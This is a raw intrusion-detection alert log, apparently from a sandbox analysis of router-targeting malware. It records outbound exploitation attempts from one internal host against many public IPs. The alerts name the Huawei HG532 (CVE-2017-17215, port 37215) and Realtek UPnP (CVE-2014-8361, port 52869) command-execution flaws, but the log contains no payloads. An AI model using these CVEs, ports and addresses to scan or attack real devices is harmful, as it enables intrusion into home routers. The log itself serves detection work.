                                      07/20/24-23:01:20.132103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968437215192.168.2.23107.152.95.200
                                      07/20/24-23:01:42.706162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3624652869192.168.2.23137.51.1.150
                                      07/20/24-23:01:43.282556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5739852869192.168.2.23202.1.176.48
                                      07/20/24-23:02:14.728323TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614849052869192.168.2.23212.231.201.227
                                      07/20/24-23:01:00.633744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3496237215192.168.2.23197.194.243.184
                                      07/20/24-23:01:07.066373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049437215192.168.2.23197.12.103.165
                                      07/20/24-23:01:53.041672TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613935252869192.168.2.23210.6.211.62
                                      07/20/24-23:01:27.650037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874637215192.168.2.2341.203.181.85
                                      07/20/24-23:01:27.650643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4025637215192.168.2.23157.71.17.129
                                      07/20/24-23:01:51.879276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4845052869192.168.2.23105.221.97.172
                                      07/20/24-23:01:52.006906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25098252869192.168.2.2331.246.229.175
                                      07/20/24-23:02:13.454278TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5348652869192.168.2.23219.135.178.135
                                      07/20/24-23:01:20.593640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5760652869192.168.2.23136.56.196.147
                                      07/20/24-23:01:45.182071TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4150652869192.168.2.2343.128.21.230
                                      07/20/24-23:01:43.199406TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615304452869192.168.2.23192.54.139.100
                                      07/20/24-23:01:44.054567TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25328652869192.168.2.2363.75.166.170
                                      07/20/24-23:01:24.885895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987437215192.168.2.23157.209.58.117
                                      07/20/24-23:01:34.046616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313437215192.168.2.23109.114.93.203
                                      07/20/24-23:01:43.905912TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613603452869192.168.2.23110.15.34.17
                                      07/20/24-23:01:03.235405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5854852869192.168.2.2337.189.124.248
                                      07/20/24-23:01:03.242934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614647052869192.168.2.2364.86.139.164
                                      07/20/24-23:01:43.165438TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615156052869192.168.2.2348.218.79.196
                                      07/20/24-23:02:53.715694TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5021452869192.168.2.23207.46.6.6
                                      07/20/24-23:01:44.859405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532852869192.168.2.2375.163.230.218
                                      07/20/24-23:01:44.142024TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5807052869192.168.2.23156.254.5.127
                                      07/20/24-23:01:02.320024TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615794652869192.168.2.23216.170.33.89
                                      07/20/24-23:02:07.942303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4853052869192.168.2.23139.93.41.17
                                      07/20/24-23:01:08.555687TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24765852869192.168.2.23109.80.210.12
                                      07/20/24-23:01:43.994464TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3971252869192.168.2.23188.26.26.188
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4162437215192.168.2.23119.175.95.208
                                      07/20/24-23:01:50.863888TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5235252869192.168.2.23131.254.60.151
                                      07/20/24-23:01:44.052569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23592652869192.168.2.23108.48.65.201
                                      07/20/24-23:01:44.945909TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3885452869192.168.2.2386.24.154.203
                                      07/20/24-23:01:47.359862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3619652869192.168.2.23221.195.227.25
                                      07/20/24-23:01:02.729047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614972252869192.168.2.23132.182.11.252
                                      07/20/24-23:01:13.994729TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5098852869192.168.2.23154.103.167.31
                                      07/20/24-23:01:42.485253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5454652869192.168.2.23194.5.145.232
                                      07/20/24-23:01:08.555688TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25966252869192.168.2.2341.215.81.142
                                      07/20/24-23:01:14.090830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169237215192.168.2.23197.222.148.4
                                      07/20/24-23:01:45.214052TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4921052869192.168.2.2352.121.181.216
                                      07/20/24-23:01:26.719998TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615605052869192.168.2.23179.142.123.85
                                      07/20/24-23:01:01.897212TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615388252869192.168.2.23136.74.174.143
                                      07/20/24-23:01:41.228794TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613308452869192.168.2.2342.245.92.167
                                      07/20/24-23:01:53.132473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4280252869192.168.2.2366.150.226.120
                                      07/20/24-23:01:04.049279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919837215192.168.2.2341.138.190.176
                                      07/20/24-23:01:49.537827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615911052869192.168.2.23182.29.32.245
                                      07/20/24-23:01:11.817297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346837215192.168.2.23157.114.226.119
                                      07/20/24-23:02:00.113044TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4781852869192.168.2.23104.83.225.175
                                      07/20/24-23:01:07.062666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844637215192.168.2.23197.129.190.37
                                      07/20/24-23:01:43.874054TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23530052869192.168.2.2312.215.198.66
                                      07/20/24-23:01:44.175702TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25726652869192.168.2.23179.77.1.115
                                      07/20/24-23:01:51.400635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3533052869192.168.2.23196.21.217.254
                                      07/20/24-23:01:43.567356TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3951652869192.168.2.23187.122.130.75
                                      07/20/24-23:01:13.157651TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614367252869192.168.2.23217.255.100.151
                                      07/20/24-23:01:07.114267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5512637215192.168.2.23157.54.178.208
                                      07/20/24-23:01:42.062724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25974052869192.168.2.2386.18.150.91
                                      07/20/24-23:01:31.975513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3701237215192.168.2.23170.28.87.249
                                      07/20/24-23:01:34.043863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3622437215192.168.2.2341.75.68.27
                                      07/20/24-23:01:41.290518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3940252869192.168.2.2353.176.94.191
                                      07/20/24-23:02:01.645032TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613371252869192.168.2.2313.93.47.50
                                      07/20/24-23:01:50.807258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3299052869192.168.2.23212.5.145.192
                                      07/20/24-23:01:55.423260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3299052869192.168.2.2337.133.189.92
                                      07/20/24-23:01:27.650870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5387037215192.168.2.2341.14.54.254
                                      07/20/24-23:01:57.313050TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615277652869192.168.2.23181.200.167.6
                                      07/20/24-23:02:11.630112TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3711252869192.168.2.238.215.93.59
                                      07/20/24-23:01:26.607132TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614643452869192.168.2.232.17.25.163
                                      07/20/24-23:01:47.275716TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25454852869192.168.2.2335.223.49.101
                                      07/20/24-23:01:05.049337TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615695252869192.168.2.235.53.123.92
                                      07/20/24-23:01:31.982801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616837215192.168.2.2341.129.91.74
                                      07/20/24-23:00:57.222164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3678837215192.168.2.2369.74.218.35
                                      07/20/24-23:01:52.582295TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23750852869192.168.2.23140.201.238.135
                                      07/20/24-23:01:11.639230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4143437215192.168.2.2399.12.166.177
                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5298637215192.168.2.2360.142.88.137
                                      07/20/24-23:02:01.357047TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613479252869192.168.2.23164.226.47.144
                                      07/20/24-23:02:04.091867TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613694652869192.168.2.23153.43.82.157
                                      07/20/24-23:01:57.082339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3607452869192.168.2.23177.72.81.243
                                      07/20/24-23:01:02.742663TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616001052869192.168.2.23196.57.233.80
                                      07/20/24-23:01:20.096752TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532637215192.168.2.23157.140.56.8
                                      07/20/24-23:01:31.982801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897037215192.168.2.23157.51.246.221
                                      07/20/24-23:01:43.078618TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24360252869192.168.2.2364.107.44.177
                                      07/20/24-23:01:02.093903TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613761652869192.168.2.23137.195.128.162
                                      07/20/24-23:00:59.192052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405637215192.168.2.23158.165.91.44
                                      07/20/24-23:01:12.806024TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24728852869192.168.2.2398.89.247.140
                                      07/20/24-23:01:45.414030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25681452869192.168.2.2353.132.125.29
                                      07/20/24-23:01:06.996055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4124837215192.168.2.2341.231.52.21
                                      07/20/24-23:01:06.996056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958237215192.168.2.23157.57.251.26
                                      07/20/24-23:01:54.979156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4808852869192.168.2.2370.60.237.131
                                      07/20/24-23:01:46.159872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4769652869192.168.2.23208.122.170.150
                                      07/20/24-23:02:05.506482TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615995852869192.168.2.2362.219.153.144
                                      07/20/24-23:01:07.066373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4094437215192.168.2.2341.137.223.0
                                      07/20/24-23:01:45.119426TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5340252869192.168.2.2393.186.61.171
                                      07/20/24-23:01:20.600303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25146652869192.168.2.23154.103.167.31
                                      07/20/24-23:01:49.836373TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23395452869192.168.2.2344.152.141.175
                                      07/20/24-23:01:11.630543TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364037215192.168.2.2341.206.100.188
                                      07/20/24-23:01:34.050672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4504237215192.168.2.23197.31.86.74
                                      07/20/24-23:01:43.906353TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24966252869192.168.2.23205.59.131.231
                                      07/20/24-23:00:59.203960TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3966837215192.168.2.23157.53.103.29
                                      07/20/24-23:02:06.553447TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5922852869192.168.2.23199.27.212.72
                                      07/20/24-23:01:45.484487TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615174652869192.168.2.23182.81.116.37
                                      07/20/24-23:01:14.387649TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3318052869192.168.2.2352.164.165.154
                                      07/20/24-23:01:43.998794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5540652869192.168.2.2339.170.42.160
                                      07/20/24-23:01:49.567841TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4650052869192.168.2.23180.71.140.26
                                      07/20/24-23:01:04.049279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810037215192.168.2.23114.96.82.28
                                      07/20/24-23:01:48.369883TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615301852869192.168.2.23202.109.173.165
                                      07/20/24-23:01:42.656154TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616062252869192.168.2.23148.6.1.136
                                      07/20/24-23:00:57.221504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223237215192.168.2.23197.155.27.254
                                      07/20/24-23:01:47.693711TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23794652869192.168.2.2338.115.164.104
                                      07/20/24-23:01:26.222978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3839252869192.168.2.239.241.118.240
                                      07/20/24-23:01:41.266946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4250452869192.168.2.23190.248.52.121
                                      07/20/24-23:01:47.108019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5811052869192.168.2.2393.255.151.238
                                      07/20/24-23:01:03.299761TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616024652869192.168.2.2340.55.203.85
                                      07/20/24-23:01:44.831438TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5167252869192.168.2.2360.88.74.46
                                      07/20/24-23:01:43.028316TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6044052869192.168.2.23124.217.174.35
                                      07/20/24-23:01:44.099658TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614953652869192.168.2.2390.126.99.183
                                      07/20/24-23:00:59.154067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002637215192.168.2.23197.213.172.133
                                      07/20/24-23:01:07.005156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134437215192.168.2.23177.72.160.248
                                      07/20/24-23:01:26.111043TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613701652869192.168.2.23152.161.99.53
                                      07/20/24-23:01:41.148932TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615409052869192.168.2.23123.91.96.233
                                      07/20/24-23:01:47.632780TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615335052869192.168.2.2341.48.241.197
                                      07/20/24-23:01:53.281781TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23414652869192.168.2.2383.238.5.172
                                      07/20/24-23:01:58.042671TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615560852869192.168.2.2354.153.180.221
                                      07/20/24-23:01:04.592707TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616059452869192.168.2.23123.31.253.14
                                      07/20/24-23:01:47.024843TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25999052869192.168.2.23170.93.66.190
                                      07/20/24-23:01:44.868029TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24385452869192.168.2.23189.200.249.59
                                      07/20/24-23:01:47.775082TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5507852869192.168.2.23165.18.43.140
                                      07/20/24-23:01:14.113390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701437215192.168.2.2341.9.205.142
                                      07/20/24-23:01:34.060991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4331237215192.168.2.2363.249.161.117
                                      07/20/24-23:01:42.762943TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5886252869192.168.2.2370.82.6.11
                                      07/20/24-23:01:44.706302TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3804852869192.168.2.23107.79.192.172
                                      07/20/24-23:01:24.877747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5086837215192.168.2.2339.16.82.179
                                      07/20/24-23:01:44.306318TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613993252869192.168.2.23186.139.241.135
                                      07/20/24-23:01:47.943232TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5052652869192.168.2.23108.46.15.204
                                      07/20/24-23:01:31.326982TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24432052869192.168.2.23112.202.108.197
                                      07/20/24-23:01:52.972472TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23733252869192.168.2.23132.77.166.224
                                      07/20/24-23:01:42.474339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5125252869192.168.2.2341.250.44.72
                                      07/20/24-23:01:47.700893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3808452869192.168.2.2392.55.62.242
                                      07/20/24-23:01:42.374543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5357052869192.168.2.23142.105.178.104
                                      07/20/24-23:01:45.414030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5503652869192.168.2.23118.151.178.3
                                      07/20/24-23:01:43.813001TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019052869192.168.2.23112.206.146.120
                                      07/20/24-23:02:09.148759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4477852869192.168.2.2380.223.189.233
                                      07/20/24-23:01:31.333805TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3673452869192.168.2.23168.91.139.254
                                      07/20/24-23:01:42.786028TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23826052869192.168.2.2317.37.38.42
                                      07/20/24-23:01:31.978141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5745437215192.168.2.2341.151.67.249
                                      07/20/24-23:01:42.213822TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616083052869192.168.2.23137.75.123.123
                                      07/20/24-23:01:41.374418TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3896652869192.168.2.23150.125.163.90
                                      07/20/24-23:01:42.677814TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4390052869192.168.2.23204.114.85.200
                                      07/20/24-23:01:01.886452TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5191852869192.168.2.23105.234.100.63
                                      07/20/24-23:01:08.672944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25589052869192.168.2.2391.10.179.128
                                      07/20/24-23:01:50.848727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5354052869192.168.2.23155.90.77.175
                                      07/20/24-23:00:57.221550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181837215192.168.2.23207.93.222.13
                                      07/20/24-23:01:02.316096TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925852869192.168.2.23190.34.49.149
                                      07/20/24-23:01:42.010169TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23649252869192.168.2.23186.68.76.128
                                      07/20/24-23:01:42.399678TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6076252869192.168.2.2340.23.131.130
                                      07/20/24-23:01:41.412156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614811852869192.168.2.2391.23.23.187
                                      07/20/24-23:01:40.291616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4975837215192.168.2.2389.37.35.33
                                      07/20/24-23:01:31.327808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24448252869192.168.2.2391.130.242.221
                                      07/20/24-23:01:43.091220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5879452869192.168.2.23101.52.13.24
                                      07/20/24-23:01:41.286262TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613293052869192.168.2.23181.147.220.98
                                      07/20/24-23:00:57.220954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406437215192.168.2.23221.200.167.164
                                      07/20/24-23:01:43.300793TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3678852869192.168.2.2347.244.160.188
                                      07/20/24-23:01:21.928521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4611237215192.168.2.2365.112.198.241
                                      07/20/24-23:01:41.407067TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615662252869192.168.2.2378.5.59.56
                                      07/20/24-23:01:20.144672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874037215192.168.2.23179.166.208.19
                                      07/20/24-23:01:49.750742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4283252869192.168.2.2367.179.229.220
                                      07/20/24-23:02:05.476791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4984252869192.168.2.2383.250.249.17
                                      07/20/24-23:01:43.118475TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615569852869192.168.2.23151.149.108.97
                                      07/20/24-23:02:12.248256TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5800052869192.168.2.2346.119.183.52
                                      07/20/24-23:01:06.996056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935437215192.168.2.2361.122.127.136
                                      07/20/24-23:01:11.634077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292237215192.168.2.2341.74.2.198
                                      07/20/24-23:02:05.506482TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4727252869192.168.2.2375.15.32.116
                                      07/20/24-23:02:20.036130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4345852869192.168.2.2338.132.172.199
                                      07/20/24-23:00:59.185032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462637215192.168.2.2341.160.207.169
                                      07/20/24-23:01:42.745085TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23308852869192.168.2.23192.59.76.250
                                      07/20/24-23:01:08.677189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23740052869192.168.2.23133.46.67.74
                                      07/20/24-23:01:42.619336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3707652869192.168.2.2340.50.75.236
                                      07/20/24-23:01:42.837135TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23485452869192.168.2.2348.145.35.196
                                      07/20/24-23:01:14.035496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3406837215192.168.2.23190.5.182.99
